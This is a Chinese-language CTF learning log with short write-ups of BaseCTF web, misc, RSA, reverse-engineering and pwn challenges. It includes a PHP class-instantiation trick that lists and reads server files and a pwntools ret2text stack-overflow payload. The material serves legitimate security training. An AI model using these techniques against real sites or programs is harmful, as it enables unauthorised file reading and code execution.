2.14学习记录
Web
flag直接读取不就行了?
代码审计:
<?php
highlight_file('index.php');
# 我把flag藏在一个secret文件夹里面了,所以要学会遍历啊~
error_reporting(0);
$J1ng = $_POST['J'];
$Hong = $_POST['H'];
$Keng = $_GET['K'];
$Wang = $_GET['W'];
$dir = new $Keng($Wang);
foreach($dir as $f) {
echo($f . '<br>');
}
echo new $J1ng($Hong);
?>
题目提示flag藏在secret文件夹里面,要学会遍历,先看明白四个参数是干什么的
K、W是通过POST方式请求并且是通过类的方式创建了一个对象dir
K:可以通过查询php文档找遍历的类。我找到的是DirectoryIterator这个类,所以K传入的就是这个类。
W:一般就先访问根目录 传入 ”/“
根据提示 说flag在secret文件夹里面,所以就直接http://challenge.basectf.fun:29227/?K=DirectoryIterator&W=/secret
可以找到flag文件;从KW中只能得到flag的路径,读取还是需要查询PHP中读取文件的类是什么。经查询可以得到是SplFileObject类。再通过传入刚刚得到的flag文件的路径可以读取flag文件。
得到flag的位置,在元素选项中找到flag
misc
watermark
根据名字,不难猜出是水印有关的题目
下载附件后有三个文件,第一个txt文档,根据提示,使用在线工具
得到了key1,
第二张图片。使用watermark盲水印工具查看
第三个压缩包的密码就是key1和key2,解压后得到txt在里面搜索isctf
发现flag
crypto
babyrsa
根据名字就能看出来子是rsa加密
题目:
from Crypto.Util.number import *
flag=b'BaseCTF{}'
m=bytes_to_long(flag)
n=getPrime(1024)
e=65537
c=pow(m,e,n)
print("n =",n)
print("e =",e)
print("c =",c)
"""
n = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832
"""
exp:
from Crypto.Util.number import *
import gmpy2
n = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832
phin = n-1
d = gmpy2.invert(e, phin)
m = pow(c, d, n)
print(long_to_bytes(m))
re
BasePlus
拿到附件先查壳,发现没壳
用ida打开找到主调函数
int __fastcall main(int argc, const char **argv, const char **envp)
{
char Str1[2032]; // [rsp+20h] [rbp-FF8h] BYREF
char v5[2056]; // [rsp+810h] [rbp-808h] BYREF
_main();
printf("Try typing something:");
scanf("%s", v5);
Encode(v5, Str1);
if ( !strcmp(Str1, "lvfzBiZiOw7<lhF8dDOfEbmI]i@bdcZfEc^z>aD!") )
printf("Wow, you actually got the flag");
else
printf("Maybe you need to try again?");
return 0;
发现对字符串进行了encode处理
这里发现对字符串进行了异或处理,再向上去发掘
v4 = v17;
v5 = 4i64;
v6 = 0i64;
v7 = 0;
do
{
v15 = 0;
v16 = 0;
if ( v3 > v7 )
{
v10 = v7 + 1;
v11 = 1i64;
do
{
v7 = v10;
*(&v14 + v11) = a1[v10 - 1];
v12 = (int)v11 <= 2;
v13 = v3 > (int)v10++;
++v11;
}
while ( v13 && v12 );
}
v17[0] = Secret[(unsigned __int8)v15 >> 2];
v17[1] = Secret[(HIBYTE(v15) >> 4) | (16 * (_BYTE)v15) & 0x30];
v17[2] = Secret[(v16 >> 6) | (4 * HIBYTE(v15)) & 0x3C];
v17[3] = Secret[v16 & 0x3F];
v8 = v6;
do
{
这一坨用ai分析了一下是base64加密,而且是换表的,根据secret数组进行加密,那么就可以分析出思路:先将字符异或回去,再根据secret数组进行base64
pwn
Ret2text
一道栈溢出,用ida找一下主调函数
这道题不需要远程执行,只需要在本地打进去就行了
exp:
from pwn import *
file = process('./pwn1')
add = 0x04011BB
playload = b'a'*0x20+b'b'*0x08+p64(add)
file.sendline(playload)
file.interactive()
打通后就可以得到flag了